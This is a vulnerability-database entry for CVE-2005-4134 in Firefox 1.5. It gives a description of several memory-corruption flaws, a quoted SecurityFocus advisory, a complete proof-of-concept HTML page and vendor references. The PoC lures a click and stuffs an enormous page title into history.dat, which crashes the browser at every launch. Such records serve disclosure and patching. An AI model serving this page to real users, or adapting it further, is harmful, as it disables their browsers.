Mozilla Firefox Multiple Remote Security Vulnerabilities

Vulnerability ID: 1109420
Vulnerability type: Buffer overflow
Published: 2005-12-08
Updated: 2008-09-10
CVE ID: CVE-2005-4134
CNNVD ID: CNNVD-200512-175
Platform: Multiple
CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/26762
https://www.securityfocus.com/bid/15773
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-175
|Vulnerability details
Mozilla Firefox is a very popular open-source web browser. Its implementation contains multiple security vulnerabilities that a remote attacker may exploit to execute code on the user's system. The garbage collector of the Firefox JavaScript engine does not adequately protect temporary variables, so a remote attacker can cause memory corruption by creating specially crafted objects. A remote attacker can also trigger a memory access error by dynamically changing the style of an object, which may lead to execution of arbitrary instructions. A remote attacker can trigger a memory access error by referencing, from an HTML file, the built-in QueryInterface() method of the Location and Navigator objects, again possibly leading to execution of arbitrary instructions. The XULDocument.persist() function does not properly validate user-supplied attribute names, so a remote attacker may inject XML data into localstore.rdf, which is loaded when the browser starts. The E4X, SVG and Canvas features contain integer overflow vulnerabilities that a remote attacker may exploit to execute arbitrary instructions. The XML parser may read data beyond the end of a buffer, crashing the browser. Finally, the E4X implementation incorrectly exposes the internal AnyName object to web content; two cooperating domains can use it to pass information between them, violating the same-origin policy.
|Vulnerability exploit (EXP)
source: http://www.securityfocus.com/bid/15773/info

Mozilla Firefox is reportedly prone to a remote denial-of-service vulnerability.

This issue presents itself when the browser handles a large entry in the 'history.dat' file. An attacker may trigger this issue by enticing a user to visit a malicious website and by supplying excessive data to be stored in the affected file.

This may cause a denial-of-service condition.

**UPDATE: Proof-of-concept exploit code has been published. The author of the code attributes the crash to a buffer-overflow condition. Symantec has not reproduced the alleged flaw. 

<!-- Firefox 1.5 buffer overflow

Basically Firefox logs all kinds of URL data in its history.dat file;
this little script will set a really large topic and Firefox will then
save that topic into its history.dat. The next time that Firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen every time until you manually delete the history.dat file -- which
most users won't figure out.

This proof of concept will only prevent someone from reopening
their browser after being exploited. DoS, if you will. However, code
execution is possible with some modifications.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
	// Build a 5000-character string of "A"s.
	var buffer = "";
	for (var i = 0; i < 5000; i++) {
		buffer += "A";
	}
	// Append that string 500 more times, giving a title of roughly 2.5 million characters.
	var buffer2 = buffer;
	for (i = 0; i < 500; i++) {
		buffer2 += buffer;
	}
	// Firefox records the page title in history.dat; the oversized entry
	// is what crashes the browser on its next start.
	document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME</a></body></html>
|Affected products
Ubuntu Linux 5.10 (powerpc)
Ubuntu Linux 5.10 (i386)
Ubuntu Linux 5.10 (amd64)
Ubuntu Linux 5.04 (powerpc)
Ubuntu Linux 5.04 (i386)
Ubuntu Ubuntu
|References

Source: UBUNTU
Name: USN-275-1
Link: http://www.ubuntulinux.org/support/documentation/usn/usn-275-1
Source: UBUNTU
Name: USN-271-1
Link: http://www.ubuntulinux.org/support/documentation/usn/usn-271-1
Source: BID
Name: 16476
Link: http://www.securityfocus.com/bid/16476
Source: BID
Name: 15773
Link: http://www.securityfocus.com/bid/15773
Source: FEDORA
Name: FLSA-2006:180036-2
Link: http://www.securityfocus.com/archive/1/archive/1/425978/100/0/threaded
Source: FEDORA
Name: FLSA:180036-1
Link: http://www.securityfocus.com/archive/1/archive/1/425975/100/0/threaded
Source: REDHAT
Name: RHSA-2006:0200
Link: http://www.redhat.com/support/errata/RHSA-2006-0200.html
Source: REDHAT
Name: RHSA-2006:0199
Link: http://www.redhat.com/support/errata/RHSA-2006-0199.html
Source: FEDORA
Name: FEDORA-2006-076
Link: http://www.redhat.com/archives/fedora-announce-list/2006-February/msg00006.html
Source: FEDORA
Name: FEDORA-2006-075
Link: http://www.redhat.com/archives/fedora-announce-list/2006-February/msg00005.html
Source: OSVDB
Name: 21533
Link: http://www.osvdb.org/21533
Source: MISC
Link: http://www.networksecurity.fi/advisorie